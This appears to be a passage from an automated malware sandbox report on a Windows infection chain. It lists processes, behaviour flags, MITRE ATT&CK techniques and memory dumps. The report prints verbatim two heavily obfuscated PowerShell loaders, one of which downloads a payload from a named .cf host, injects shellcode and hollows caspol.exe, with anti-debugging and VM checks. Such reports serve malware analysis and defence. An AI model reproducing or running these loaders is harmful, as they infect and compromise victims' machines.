In'In4Mo5My5Po2Mi4Se3Po4Mi2Gr4Sp5No5Po9Ho1Sl7sk1Ln3Pa7Au1In5Af6Ma4Al5Ge5Am2In5Co9Ne5br8Hy4In3St1Un9Sk7Ld4Ep4Tu5Du5re2So5Go6Ki4Pr3Fj5Di2Re6Sh3Ov4AmECe4Co7Ar5Am2Ga1ElFJo1BrENe'En;Pa&Ta(Hi`$MaDTyiHucKohUaeFe7hy)Im Ta`$AdDBiiPaaaenstaUnlFiuInnMi5hy Ha Fe Sa;Bu}Me`$EpWFoeLaaCutdrhOpeInrPr Ta=Ud AnHLaTToBKa Lo'Ca5TrCPa5rr2Mo4Sa5Re5Sp9Ri5Va2Op5ReBTr0re4St0He5Pa'au;hy`$TiDPriTaaOdnHoaColLeuVanSu6Te Af=St ReHZuTReBSk Ir'Ta1Mi3So6Ga3Gi5KoFMi4Dd2Ma4Tr5Hy5ChEUn5Ak5At1De7Ho0SlAFe1fr7Rj6BaCRe6He4Ad4DeERe4Tt4Pn4Bo3an5Fr2Ve5MoAUn1Di9Fo6De5He4Ti2Ad5Sl9Xo4Co3Fi5EuERi5SpAEt5Sc2Po1St9Ub7bjENe5Gt9Ur4Un3Pf5In2De4Ku5Re5Re8Po4Po7Re6My4Va5re2Tr4Ro5Ac4Ko1Dr5SvEGr5Br4Ti5lg2Ju4Ku4No1La9In7HjALi5De6Tj4Au5Gr4Di4St5LaFDe5Sk6Sa5StBPa6SuAFe0deDSi0EiDSk7Ce0Re5In2Ta4Sa3Se7St3Ls5Tw2Ch5ArBLi5Ci2Gn5Se0as5Ru6ta4De3Ne5Bo2Ac7In1Ba5in8We4Gv5Pa7Ca1Kr4Vo2Sk5Pr9Zo5Be4He4Bo3De5BaEEg5De8Pr5Pr9Ka6Ki7pe5Un8un5FaEBe5St9Ra4pu3Ma5Fa2In4Sn5Ti1JaFer1UnFBo5In1In5DaCAf4Lj7El1Fl7Om1Et3In6Re0Po5Rr2Du5Ma6Bi4Sa3La5IlFan5St2Ud4Tr5Ar1Er7Mi1Gu3Te7Gi3Ge5KvEFo5Fl4Va5RaFAn5Gn2Vi0Op3Pr1AxEWo1DrBHm1Un7He1ApFgl7Ne0Ud7Ob3La6Bl3co1Re7Re7Fr7pi1heFMu6DiCEk7TrETh5Ka9Di4St3Fa6An7Ca4Di3Ov4Ta5ka6ElAPa1ReBSl1Co7Co6KlCUn6Oc2Bl7EhEFe5Hi9Re4Ra3Ti0Sa4Fu0Pa5Tr6ScAAt1VaBca1Di7Bl6ToCEp6An2Ta7UdEPr5Ka9Pa4Ab3Si0So4Ta0St5Ga6PaASu1AdBLo1Ha7Cr6SeCUd6Sh2Cl7AcESu5Si9Ke4Up3Fr0Ma4Ge0Ca5Fi6KlASe1MoEHe1An7Pr1BoFFi6FrCfa7LuEPo5Qu9Tu4Fi3La6Mo7Ps4Pi3Sk4En5Fa6elAAf1BeESp1DoEPe1ArEEa'Re;Va&lo(Un`$MeDpoimecTahAneSk7Si)Hu fo`$kaDPeiBoaAfnRoaMalMiuLanab6Hy;Ma`$DrSsklSaePrnBetElrPieFl1Ov7Ug7ta Eu=Ko SufCykRupOv Fe`$ChDTeiSocHohSyene5Na Ur`$GeDSuiAfcNehCoePr6Ov;Pr`$HyDStiJiaAfnFoaSclBiuUmnPo7Th Sk=Hm UrHSnTNuBPi Ga'Sp1ma3No7Fi1Ba4Af2Rn5FrBSe5Me3Fr4Da3av4Ri5Di5Ma1te5To1De5Th2Hf0ar4te1Ke7Na0OrAMo1Li7Se1Na3Se6Jo3Un5NaFPo4Sl2Cu4se5Ph5KoEKo5ad5De1Se9On7SiEFo5Ju9Fa4Fu1Pr5Al8Kl5SkCBs5An2Ti1RaFlo6FoCUn7FaETe5To9On4Fi3Ra6Pa7Po4Me3Ca4pr5Me6SlAVe0AnDOf0EaDBl6UnDSa5Op2un4Un5In5Un8Dk1ViBPl1So7Bo0St1en0Vr3In0MeFIn1SaBPr1Ho7pa0Ul7Ti4AnFGu0Fo4Fr0Pr7Ti0Ga7Ve0To7Bi1foBSu1Li7Fo0Un7Ad4ExFOf0J 3Tr0Fo7Wh1UnEUn'Mi;Go&At(Ke`$DoDReiKucBehCoere7op)Ma Ri`$HjDNyiVeaRenPsaEmlLiuCrnVe7Ti;Ra`$UnDStiUnarenKoaNolKvuvinRe8Re Un=St foHReTUdBAt Co'Tr1Ar3Cl7OmBFu5co8Di4bu2fe5ba9Im5Be6Un5Om9Si5KrEMi4Un4Re5ep5Pi5Re8Sc1Fi7Av0MoAAn1Or7At1Un3Or6Sg3Re5ReFni4Bi2Sk4So5Ju5JeEUn5Cl5Ou1Fl9Rr7hlEka5De9Cr4As1Re5Br8Un5InCmu5Sa2Br1PrFLe6HoCUr7DeEmu5Ro9Si4Ov3Sa6El7Ce4Si3Sa4Eh5Sk6StATy0LoDAf0suDGa6SpDWi5Wa2ha4ya5Di5St8Bl1InBIn1Pr7Ka0Ly5Fi0Cl7He0St1Fe0Hu2Sk0Ma1Ma0Bo6Om0sa5Te0KeFGa1KeBUn1St7Ve0Pr7Te4BeFIn0De4Ko0th7Te0In7Ap0Or7Go1MaBMi1Ud7He0Sy7Fo4WiFSe0In3Pa1KoEDe'Ka;Di&Zy(En`$PlDFuiSocOehPieRe7La)Fr Sk`$DeDEliPaaTenAzaPalBouDenRe8To;Ca`$PaiPhsUnoSnmKo0Ju1St he=Sm Pi'KohOptVetUnpDu:ko/En/SymTrelagTroMioPlkFobCopBenPrqTy.KocPafHe/paUEmnOviYonUrtAaeMerEf.NetSphConkr'Pi;or`$NyiGrsKloCrmEl0mi0zo Da=So UnHUnTUfBBa Ko'Mo1Re3un7Va5Mi4Re5Ir5Wi2De5Or3Fj4Ap3Sa5Yd1St5De6Id4Al1Ne5Is9He5mo2In1Sy7Un0InATi1Ke7No1TiFRe7Ib9Cy5Re2Ha4Fi0Re1TaASp7Se8Af5Pr5Uo5IdDAr5Pa2St5Sk4Be4Hy3Pa1Re7Me7Af9St5Ye2Ca4Ek3li1Ex9Vi6Sa0Ku5Oc2Ko5Ne5Pr7ar4Af5BrBPo5TiEan5Su2Ba5Av9Kr4Op3cr1JoESk1Ga9Ma7Ad3Pa5Fe8Be4Am0Pu5Sq9Bi5KoBUn5Vr8Bo5Ha6Ca5Ti3Ju6Is4Fl4Pr3Sp4sp5Ni5MoEBr5Sv9Cr5St0Ta1HyFSl1La3ge5SkESt4Su4Fr5Pr8Bl5PaASw0Pr7He0Ex6Bo1KaESa'Od;Ar`$AtDFoiJeaJonOuaBelSkuKonsc8Sa Ca=ka FoHVeTOtBIt an'Sa1mi3Sk7Av1El4Ki2Pe5AnBEp5Ho3Uo4Se3Fr4No5Sj5St1Bi5Sp1To5Ce2Ob0Ah5Po0TrAba1So3be5Ob2Sp5Ne9Kv4Em1Ar0CoDTo5Pr6Em4Pl7Tu4Kl7Sy5St3Fl5Wa6Ka4Po3Tw5Bl6Co'Bu;El&Br(tr`$kaDPriOicTrhFoehu7Gl)Br Th`$BaDUfiOvaFenSpaHolSuuUnnDe8Qu;Sk`$ruFAcuKolTudPhtUdrJyfSufBrePi2Sa=Ti`$ScFTeuDolWaddetSurUnfTjfaneHa2Sa+Lo'Sa\UdHWyaOunRhdSe.pidDoaBltVi'La;Bi`$saBCarveeIndIntRafbyaEnvNanTeeme=No'Aj'Co;SciGifVa Sk(Sa-PrnStoSttHi(CuTReeSwsHatSp-AmPRaaHvtGhhWe La`$CoFUnuStlPrdAptcorStfUlfKreEk2Ab)Ar)St At{BowBihSkiDolAfeTh Mo(Fa`$TrBPrrSpeSudMutKafLiaGovConPleAr Re-DeeprqAf Ps'Un'De)In Ce{Vi&Ek(Pe`$NiDFuiUncSahFoele7Tr)Au Te`$LiiUnsScoSnmIg0Se0Pr;SpSBatKaaJurExtAn-CoSdelUleDeeExpKo Kv5Lu;Mo}GrSOveOptDe-mnCBroUnnBitSueAtnSatDe Ge`$ChFKouWolApdSktParAlfPsfsnePr2Om Ch`$HyBUnrIseSkdGrtRefThaSqvBynbreBi;Sp}Uf`$MoBJirLieBrdtatCofFlaThvErnUdeRe Te=Ud TaGLiedatIn-LoCsaoAfnSntOpeUnnhotHa Se`$CaFScuBrlDudvatSurBefCufKjeVa2fa;Pr`$OrDMeiPraDinReaSllfiuDence9Ep Ap=Du leHNiTLaBLe Mn'Vr1Ta3Co7Se3Sj5GoEUd5Pr6Ug5Wa9Tr5Sq6Tr5elBSt4Pa2In5Hj9De1tr7Tu0UsAHj1st7Ma6AjCPa6ka4Sr4UdEMi4Da4Bo4op3Di5Cy2Va5StAVi1So9Sk7Po4Fo5To8Fu5Ha9Mi4Ti1Sy5Ca2om4Ci5ha4Og3qu6moAAg0ChDPa0YaDRi7Bl1Av4Bi5Me5Ku8Ra5WiAAa7De5Se5Ge6de4Re4Sk5Po2Un0Re1Hv0Ka3Ml6an4Un4Ov3Ka4La5Be5FlESc5en9Fu5Un0Ja1prFTi1Hr3Su7Un5va4Fu5fo5Um2To5Di3un4Do3Si5Af1Mi5Pe6Ra4Hj1Sa5Br9Be5fe2Co1CoEAt'Af;Pe&Mi(An`$DoDCaiRocHohBleIn7Pe)Bi Sp`$DrDJuivraPlnbeaInlDyuCrnGa9St;da`$FoBInrAfePldBotEgfShaWevSmnGeeWa0Gg Ep=Mi CaHorTLuBOt Pe'An6BiCKj6Be4Fo4OvEde4Be4Gr4Se3Fl5Ga2Ju5MeACo1Ko9Li6Ga5Br4An2Be5Gr9Pe4Uv3Du5TrEPa5CiATr5Fo2Th1ov9Ic7fuEda5Po9Tw4Br3Fo5Re2Ba4An5Sk5Me8Pr4Ru7No6Ma4Nu5Do2bo4Im5In4Du1Vo5GoETe5Be4ru5Ko2Re4Hj4Pa1Me9Un7FrASp5Pr6Re4Bo5In4Re4Ro5OvFGo5Dr6Pr5ToBEl6AsAPr0BeDIn0AfDto7Gi4Me5Un8Sv4fe7ke4peEBe1NiFre1Tr3Ma7Sk3Un5GaEPa5Ou6Ku5hy9De5Gr6Es5PoBIn4Be2Fo5Go9Ko1KoBSl1Dr7Kl0Kj7Un1DeBPr1St7re1Di7Sk1Tr3In7So1Sl4Cr2Mi5CiBSi5Hy3Op4Ef3Re4Ab5Te5Un1Bo5Ce1Un5Pu2Fr0Ba4Ed1SkBNo1Kr7Ga0Ma1Le0Ud3de0BrFPa1faEBe'Kn;At&Br(Of`$AfDmiiCycHahPoeTr7Sy)Ki in`$BaBLirSteAndMotFofGaaNevStnUmeAu0Km;Un`$TrPLeiElnLesKaeRrdinaSa=Pr`$KnDFoiNoaDrnHuaAvlInuStnPr.SecTeoBouHenLitAv-De6ex4ha8Ac;Lu`$BeBFlrEseAsdAstSpfAgaTevPenTaeSh1Fr In=Ny BoHDeTDyBAl Kn'We6CoCSt6Sh4Po4PeECr4To4Ne4Sp3De5Sc2De5SpASa1Se9Aa6Co5Co4Me2Li5Un9Op4Fr3No5VdEEs5BlARe5Ov2Lf1In9Em7CoETa5Re9Re4Me3Bi5Ek2De4St5Sc5Na8Pa4St7Pr6Au4Ca5Hi2Co4Sp5Fo4Sc1Me5PrESw5Li4so5Re2Mo4Pl4Fa1Sk9An7RuADe5Un6St4gu5Ar4De4Al5BeFGe5In6Re5HoBAf6HyAAb0BuDEf0HaDDe7Un4Id5Ef8Fo4Jo7Lo4JeECh1WrFHa1Fr3Je7Be3Ha5spEAn5At6Ni5No9In5Se6Pa5InBGr4Ho2Fi5me9ab1WaBop1Ga7Se0De1Sp0In3Ab0IrFUn1NoBHe1Hy7Ki1Br3Dd7GaBRu5Fr8Al4Ho2Di5Pe9sk5Fo6De5Un9Mu5BeENo4te4Ha5Fo5mu5Sa8Iv1EkBUn1Pe7mo1Sk3In6Un7Ad5ReEMe5Sh9Cr4Fa4Su5As2Hj5Sa3Ga5Bl6Di1KuEpe'Fi;Co&El(Gr`$StDKeiPlclrhSueHy7Ha)Co Ko`$RaBForTyeAddCotFofReaPevfrnhoeFe1St;Ud`$GoBTorEmeDedLetCefAfaUnvSlnKaesu2Qu Co=Sa PiHHjTStBsk Pa'Ob1Vi3Fl6To4Li4Pa3At5HeESm5BuBPr5moBFi5Br2st5Sy3ka1He7Fo0SuAFo1Sn7Co6VaCAc6Wo4Ai4ClEto4Ha4Hk4Pa3Af5Pa2Pa5RuACo1Re9Ku6Ra5Ko4No2se5Cu9Po4De3Be5JoEde5bnAFe5Te2Ma1Sk9Sp7BaEUd5Pr9My4Ne3Ta5He2Ce4Bu5Pa5Ra8me4Ir7Ma6Du4Un5Al2Pr4Nb5Me4Re1Ov5afENe5Ud4Jo5Bi2Fa4Bi4Un1Af9Ja7SuACr5Un6Ec4Ar5Br4Ar4Og5BrFTr5Fa6Ko5RiBJo6SiAAd0RuDPa0OsDpe7Bi0St5Hj2In4Di3re7Br3Ro5Em2Fr5OvBAf5Ca2Be5Tu0He5Tr6Be4Pa3Ps5Re2Mi7Ho1to5Nu8Al4Hj5He7Pr1He4Br2Te5In9cr5Ma4An4Bn3Fy5DeEAf5Ga8En5Do9Bl6St7Su5Ta8Sy5myEWa5Ra9hv4Aa3Fa5Py2be4Fo5An1EfFPr1SqFFd5Am1Ze5AfCEt4Il7Ol1In7Ar1Gr3Sk7Em5Va5Ha2Bo5Ci5Fr4In2Sp5al3Ek5Sn2Mo5FoBOv4De4Re5Gi2Pa1Em7Fe1Ka3Si6Fo4Re5Be2ec5Un3Om5av3Pr1HoETe1SiBda1Be7Sc1BlFAd7Su0Ps7Fo3Tw6Ta3Sh1Le7Pl7Ba7Pr1SeFPr6FoCco7noEOv5Ep9Al4Ud3Ma6Ex7Re4va3Pa4Vo5bh6MaASt1VaBTe1Ka7Mr6LeCBa7UnEDe5No9Se4Na3Bu6Ga7Tp4Da3At4Ba5Po6FeASh1CiBIn1Re7Pe6ReCBr7GrEno5Ta9Am4Sa3Sk6da7Ar4Pi3Fo4Br5Pi6FiAKa1BaBGa1Ss7Ep6ArCSa7NuETi5Ne9Sn4Co3Ku6Be7Re4At3Er4Sj5Me6BrARk1CrBCe1Om7Za6BaCKr7SyEDi5Pi9Ae4Ki3Ob6At7sk4Wh3Ud4se5Pa6waAEx1ExENa1Bu7Pr1TuFQa6XyCAf7SaESc5Je9Tr4St3No6wi7re4Da3Se4De5Ov6SkADe1AlEPi1LyECh1MiEBr'Go;Uk&Ur(bo`$SuDReiBlcGrhPaeSe7Gl)Fi Sp`$TrBTrrGaeUndRhtUnfAlaBivFonVieFu2Da;li`$StBEprzeesedMatBofSnaVavPrnUdeKi3In So=Sk DeHkoTZoBSi Ti'br1Br3Cy6Tr4Ex4Pa3Ra5KoERe5MaBTr5UdBCo5Pl2Ch5Az3Pe1Re9Af7KoEAt5Dy9Pe4Ba1Wi5De8Pa5MiCNa5Cr2Fl1KrFCh1Ku3Nu7Le1Ov4Bi2At5FiBFe5No3Ju4Ku3Sj4ap5Do5Ki1Pa5Sy1Sp5Af2Lo0Te4Ic1ZoBPr1kl3Mu7ApBNu5Op8Be4Li2Li5Un9Gt5Ce6Un5Re9Gu5SyETr4Ud4Ha5gi5Ma5Dy8Un1NgBTo1Si3Re6Th4Vi5WhBSe5Sa2St5Er9Ha4Ba3Pr4Fa5Gu5Du2Pr0Su6Be0du0Fe0Tr0He1DiBUn0Vo7So1BrBCo0Mi7go1AfEpr'mo;Fo&Se(Yo`$StDGyiRecGrhNseAn7Ud)Ku At`$CyBDiroveFadUntNofSuaskvSenIneFo3Sq#Ov;""";Function Bredtfavne9 { param([String]$Bathy); For($Grey=2; $Grey -lt $Bathy.Length-1; $Grey+=(2+1)){$isom = $isom + $Bathy.Substring($Grey, 1)}; $isom;}$Escribie0 = Bredtfavne9 'ReITeEeqXFr ';$Escribie1= Bredtfavne9 $Spalt;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Escribie1 ;}else{&$Escribie0 $Escribie1;}"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1088

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$Bathy); $Lavadelsme135 = ''; Write-Host $Lavadelsme135; Write-Host $Lavadelsme135; Write-Host $Lavadelsme135; $Teniacida = New-Object byte[] ($Bathy.Length / 2); For($Grey=0; $Grey -lt $Bathy.Length; $Grey+=2){ $Teniacida[$Grey/2] = [convert]::ToByte($Bathy.Substring($Grey, 2), 16); $Teniacida[$Grey/2] = ($Teniacida[$Grey/2] -bxor 55); } [String][System.Text.Encoding]::ASCII.GetString($Teniacida);}$poemetsch0=HTB '644E4443525A19535B5B';$poemetsch1=HTB '7A5E5445584458514319605E590405196259445651527956435E41527A52435F585344';$poemetsch2=HTB '7052436745585476535345524444';$poemetsch3=HTB '644E4443525A19654259435E5A52197E594352455847645245415E545244197F5659535B52655251';$poemetsch4=HTB '4443455E5950';$poemetsch5=HTB '7052437A5853425B527F5659535B52';$poemetsch6=HTB '6563644752545E565B79565A521B177F5E5352754E645E501B176742555B5E54';$poemetsch7=HTB '654259435E5A521B177A565956505253';$poemetsch8=HTB '6552515B525443525373525B5250564352';$poemetsch9=HTB '7E597A525A58454E7A5853425B52';$Diche0=HTB '7A4E73525B5250564352634E4752';$Diche1=HTB '745B5644441B176742555B5E541B176452565B52531B177659445E745B5644441B1776424358745B564444';$Diche2=HTB '7E5941585C52';$Diche3=HTB '6742555B5E541B177F5E5352754E645E501B17795240645B58431B17615E454342565B';$Diche4=HTB '615E454342565B765B5B5854';$Diche5=HTB '5943535B5B';$Diche6=HTB '794367455843525443615E454342565B7A525A58454E';$Diche7=HTB '7E726F';$Diche8=HTB '6B';$Bebudelse=HTB '626472650405';$Sedd=HTB '74565B5B605E595358406745585476';function fkp {Param ($Superst, $Artful) ;$Dianalun0 =HTB '137958595B5E56555E5B170A171F6C76474773585A565E596A0D0D7442454552594373585A565E5919705243764444525A555B5E52441F1E174B17605F5245521A78555D525443174C17136819705B5855565B764444525A555B4E7456545F52171A765953171368197B585456435E58591964475B5E431F13735E545F520F1E6C1A066A19724642565B441F134758525A524344545F071E174A1E19705243634E47521F134758525A524344545F061E';&($Diche7) $Dianalun0;$Dianalun5 = HTB '1363455847170A17137958595B5E56555E5B197052437A52435F58531F134758525A524344545F051B176C634E47526C6A6A17771F134758525A524344545F041B17134758525A524344545F031E1E';&($Diche7) $Dianalun5;$Dianalun1 = HTB '455243424559171363455847197E5941585C521F1359425B5B1B17771F6C644E4443525A19654259435E5A52197E594352455847645245415E545244197F5659535B526552516A1F7952401A78555D52544317644E4443525A19654259435E5A52197E594352455847645245415E545244197F5659535B526552511F1F7952401A78555D525443177E59436743451E1B171F137958595B5E56555E5B197052437A52435F58531F134758525A524344545F021E1E197E5941585C521F1359425B5B1B17771F13644247524544431E1E1E1E1B171376454351425B1E1E';&($Diche7) $Dianalun1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Trfsikkerr,[Parameter(Position = 1)] [Type] $Konklaven = [Void]);$Dianalun2 = HTB '1371564552595843170A176C76474773585A565E596A0D0D7442454552594373585A565E59197352515E5952734E59565A5E54764444525A555B4E1F1F7952401A78555D52544317644E4443525A196552515B5254435E585919764444525A555B4E79565A521F134758525A524344545F0F1E1E1B176C644E4443525A196552515B5254435E585919725A5E4319764444525A555B4E75425E5B5352457654545244446A0D0D6542591E197352515E5952734E59565A5E547A5853425B521F134758525A524344545F0E1B171351565B44521E197352515E5952634E47521F13735E545F52071B1713735E545F52061B176C644E4443525A197A425B435E5456444373525B52505643526A1E';&($Diche7) $Dianalun2;$Dianalun3 = HTB '1371564552595843197352515E595274585944434542544358451F134758525A524344545F011B176C644E4443525A196552515B5254435E58591974565B5B5E5950745859415259435E5859446A0D0D64435659535645531B1713634551445E5C5C5245451E196452437E5A475B525A52594356435E5859715B5650441F134758525A524344545F001E';&($Diche7) $Dianalun3;$Dianalun4 = HTB '1371564552595843197352515E59527A52435F58531F13735E545F52051B1713735E545F52041B17137C58595C5B564152591B1713634551445E5C5C5245451E196452437E5A475B525A52594356435E5859715B5650441F134758525A524344545F001E';&($Diche7) $Dianalun4;$Dianalun5 = HTB '45524342455917137156455259584319744552564352634E47521F1E';&($Diche7) $Dianalun5 ;}$Weather = HTB '5C524559525B0405';$Dianalun6 = HTB '13635F42455E55170A176C644E4443525A19654259435E5A52197E594352455847645245415E545244197A5645445F565B6A0D0D70524373525B525056435271584571425954435E585967585E594352451F1F515C471713605256435F52451713735E545F52031E1B171F70736317771F6C7E59436743456A1B176C627E594304056A1B176C627E594304056A1B176C627E594304056A1E171F6C7E59436743456A1E1E1E';&($Diche7) $Dianalun6;$Slentre177 = fkp $Diche5 $Diche6;$Dianalun7 = HTB '1371425B53434551515204170A1713635F42455E55197E5941585C521F6C7E59436743456A0D0D6D5245581B1701030F1B17074F040707071B17074F03071E';&($Diche7) $Dianalun7;$Dianalun8 = HTB '137B58425956595E445558170A1713635F42455E55197E5941585C521F6C7E59436743456A0D0D6D5245581B17050701020106050F1B17074F040707071B17074F031E';&($Diche7) $Dianalun8;$isom01 = 'http://megookbpnq.cf/Uninter.thn';$isom00 = HTB '1375455253435156415952170A171F7952401A78555D5254431779524319605255745B5E5259431E19735840595B5856536443455E59501F135E44585A07061E';$Dianalun8 = HTB '1371425B534345515152050A135259410D56474753564356';&($Diche7) $Dianalun8;$Fuldtrffe2=$Fuldtrffe2+'\Hand.dat';$Bredtfavne='';if (-not(Test-Path $Fuldtrffe2)) {while ($Bredtfavne -eq '') {&($Diche7) $isom00;Start-Sleep 5;}Set-Content $Fuldtrffe2 $Bredtfavne;}$Bredtfavne = Get-Content $Fuldtrffe2;$Dianalun9 = HTB '13735E5659565B4259170A176C644E4443525A19745859415245436A0D0D7145585A7556445201036443455E59501F13754552534351564159521E';&($Diche7) $Dianalun9;$Bredtfavne0 = HTB '6C644E4443525A19654259435E5A52197E594352455847645245415E545244197A5645445F565B6A0D0D7458474E1F13735E5659565B42591B17071B17171371425B534345515152041B1701030F1E';&($Diche7) $Bredtfavne0;$Pinseda=$Dianalun.count-648;$Bredtfavne1 = HTB '6C644E4443525A19654259435E5A52197E594352455847645245415E545244197A5645445F565B6A0D0D7458474E1F13735E5659565B42591B1701030F1B17137B58425956595E4455581B1713675E59445253561E';&($Diche7) $Bredtfavne1;$Bredtfavne2 = HTB '1364435E5B5B5253170A176C644E4443525A19654259435E5A52197E594352455847645245415E545244197A5645445F565B6A0D0D70524373525B525056435271584571425954435E585967585E594352451F1F515C4717137552554253525B44521713645253531E1B171F70736317771F6C7E59436743456A1B176C7E59436743456A1B176C7E59436743456A1B176C7E59436743456A1B176C7E59436743456A1E171F6C7E59436743456A1E1E1E';&($Diche7) $Bredtfavne2;$Bredtfavne3 = HTB '1364435E5B5B5253197E5941585C521F1371425B534345515152041B137B58425956595E4455581B13645B52594345520600001B071B071E';&($Diche7) $Bredtfavne3#"
3⤵
- Blocklisted process makes network request
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:280

C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
4⤵
- Checks QEMU agent file
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 816 -s 1360
5⤵
- Program crash
PID:1776

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

1

T1059

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/280-73-0x0000000077130000-0x00000000772B0000-memory.dmp

Filesize
1.5MB

Download
memory/280-67-0x0000000005B10000-0x0000000006EC3000-memory.dmp

Filesize
19.7MB

Download
memory/280-72-0x0000000076F50000-0x00000000770F9000-memory.dmp

Filesize
1.7MB

Download
memory/280-87-0x0000000077130000-0x00000000772B0000-memory.dmp

Filesize
1.5MB

Download
memory/280-86-0x0000000005B10000-0x0000000006EC3000-memory.dmp

Filesize
19.7MB

Download
memory/280-79-0x0000000005B10000-0x0000000006EC3000-memory.dmp

Filesize
19.7MB

Download
memory/280-74-0x0000000077130000-0x00000000772B0000-memory.dmp

Filesize
1.5MB

Download
memory/280-62-0x0000000000000000-mapping.dmp

Download
memory/280-63-0x0000000074BB1000-0x0000000074BB3000-memory.dmp

Filesize
8KB

Download
memory/280-68-0x0000000072F90000-0x000000007353B000-memory.dmp

Filesize
5.7MB

Download
memory/280-65-0x0000000072F90000-0x000000007353B000-memory.dmp

Filesize
5.7MB

Download
memory/816-90-0x0000000000C60000-0x0000000002013000-memory.dmp

Filesize
19.7MB

Download
memory/816-82-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/816-71-0x0000000000C5768E-mapping.dmp

Download
memory/816-92-0x0000000077130000-0x00000000772B0000-memory.dmp

Filesize
1.5MB

Download
memory/816-91-0x0000000077130000-0x00000000772B0000-memory.dmp

Filesize
1.5MB

Download
memory/816-85-0x0000000000400000-0x000000000043A000-memory.dmp

Filesize
232KB

Download
memory/816-75-0x0000000000C60000-0x0000000002013000-memory.dmp

Filesize
19.7MB

Download
memory/816-83-0x0000000000401000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/816-80-0x0000000076F50000-0x00000000770F9000-memory.dmp

Filesize
1.7MB

Download
memory/816-81-0x0000000077130000-0x00000000772B0000-memory.dmp

Filesize
1.5MB

Download
memory/988-55-0x0000000000000000-mapping.dmp

Download
memory/1088-88-0x000000000265B000-0x000000000267A000-memory.dmp

Filesize
124KB

Download
memory/1088-61-0x0000000002654000-0x0000000002657000-memory.dmp

Filesize
12KB

Download
memory/1088-59-0x000007FEF3E10000-0x000007FEF4833000-memory.dmp

Filesize
10.1MB

Download
memory/1088-57-0x0000000000000000-mapping.dmp

Download
memory/1088-66-0x0000000002654000-0x0000000002657000-memory.dmp

Filesize
12KB

Download
memory/1088-60-0x000007FEF30C0000-0x000007FEF3C1D000-memory.dmp

Filesize
11.4MB

Download
memory/1088-64-0x000000000265B000-0x000000000267A000-memory.dmp

Filesize
124KB

Download
memory/1720-56-0x000007FEFB7D1000-0x000007FEFB7D3000-memory.dmp

Filesize
8KB

Download
memory/1776-54-0x0000000000000000-mapping.dmp

Download
memory/1776-89-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads